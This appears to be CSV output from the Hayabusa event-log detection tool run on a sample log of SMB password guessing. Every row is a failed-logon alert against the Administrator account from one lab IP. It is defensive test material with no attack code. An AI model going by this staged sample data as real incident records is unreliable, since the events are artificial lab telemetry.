2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rWoX76sgYTVwxkD5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QQFJRRYn6sjYK5cD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wyVuBGEFGJqImQ7W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pRvnyVGxG8i0e3PQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X6Hv2fj43a8j1O2P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: myP4zVFyw2qE1SV7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lpmBcVilH72dYF7E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Jd9hKGDxLcnZphlL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5OmXgOD9kaGJ4PIA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BpQtWW0fAEzNH28B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EgNkY8LKSWcnLM00  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z8S1dUwb3HjOnEs9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 49ZKcnswdISJDwbS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qOuYmww71pTM0l3t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PUHoGgmXKRJknRZG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6yf8LSkcwBP9s1mN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JmH2AMDmkZVbCt8b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I23o9EQLpPpn9RlY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MrEVj3DB1prpOtnq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0Iau1IHKxWRsqQaG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NdPC9LVhZS2l27XF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vxcofRpjCFme3mg2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e1VnQLbETh1GgX0c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rbdPYXx8mx4SV9G7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hcv3HWid3auIu7cY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5o2OviUvdOmk5HON  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bVBSORhgFwTy2TWO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DsIhCEZcfYenufvf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xDadVFtE4toNiagy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GnydJjDBdzJWqmWa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GW8im2IhNzrGoSFs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aTzlqq9HLEX6wzdU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Gz98aGXd0fdVzmTy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q2zOy64cp6dXelNl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X1BflxNjQRNopjb4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 401ulFeuzCtp5lPF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p0SIzJrzkseFB1j8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cyQMxtEdbud8iJLI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7gbjIqxD4E6fYsGx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rEeZEcj63sBddCsK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tiATfqYtrH9LoqR0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PG3HB3GqFwQFLdcq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: G8NU6WRdrq9DxM6r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cvZKIkI2aeBzbwe0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2EE7AL3nJ7qsnk4Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: feu34D0VvoMrnWzo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mrNRIpCpmAV3npax  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zpxgEvvoC0stFdTl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XvpDKRAPDS36sqNL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4cqJKEIySxiQdCRD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Pm1F7QEwBE054ui0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RvIjhyfdlXiX72Es  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dJilW4KgIEeh5VNr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Ka0FYYdVOj90l0L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B9ZjGE8T6RuGx8SZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nkti4BGVrpoAQRBL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fZy2YJPOg1YZ2bd0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rUE6E9H9i0l0P7Jp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0Pkpt2nmRorQ3x0o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hCZNNzSyi4mLLaxZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O9ZqF43sDjSirvMK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XOw9DjHISDX57XUe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rmxFpEQeGsgbXpDy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MfIVCOOWQS7TNKQA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uweLaLhvznDee1IF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oNQcS2BonF12ikiX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: D43Flf2keSL3aph6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zw7nJXNHZ2QNa3In  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UZp4567BIWAwxF9r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S9iVvPuykq62pV9z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eRVomETC34InuKPk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VpHfjKgAxChSYz8R  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tIbTy5IDRy90lbUR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
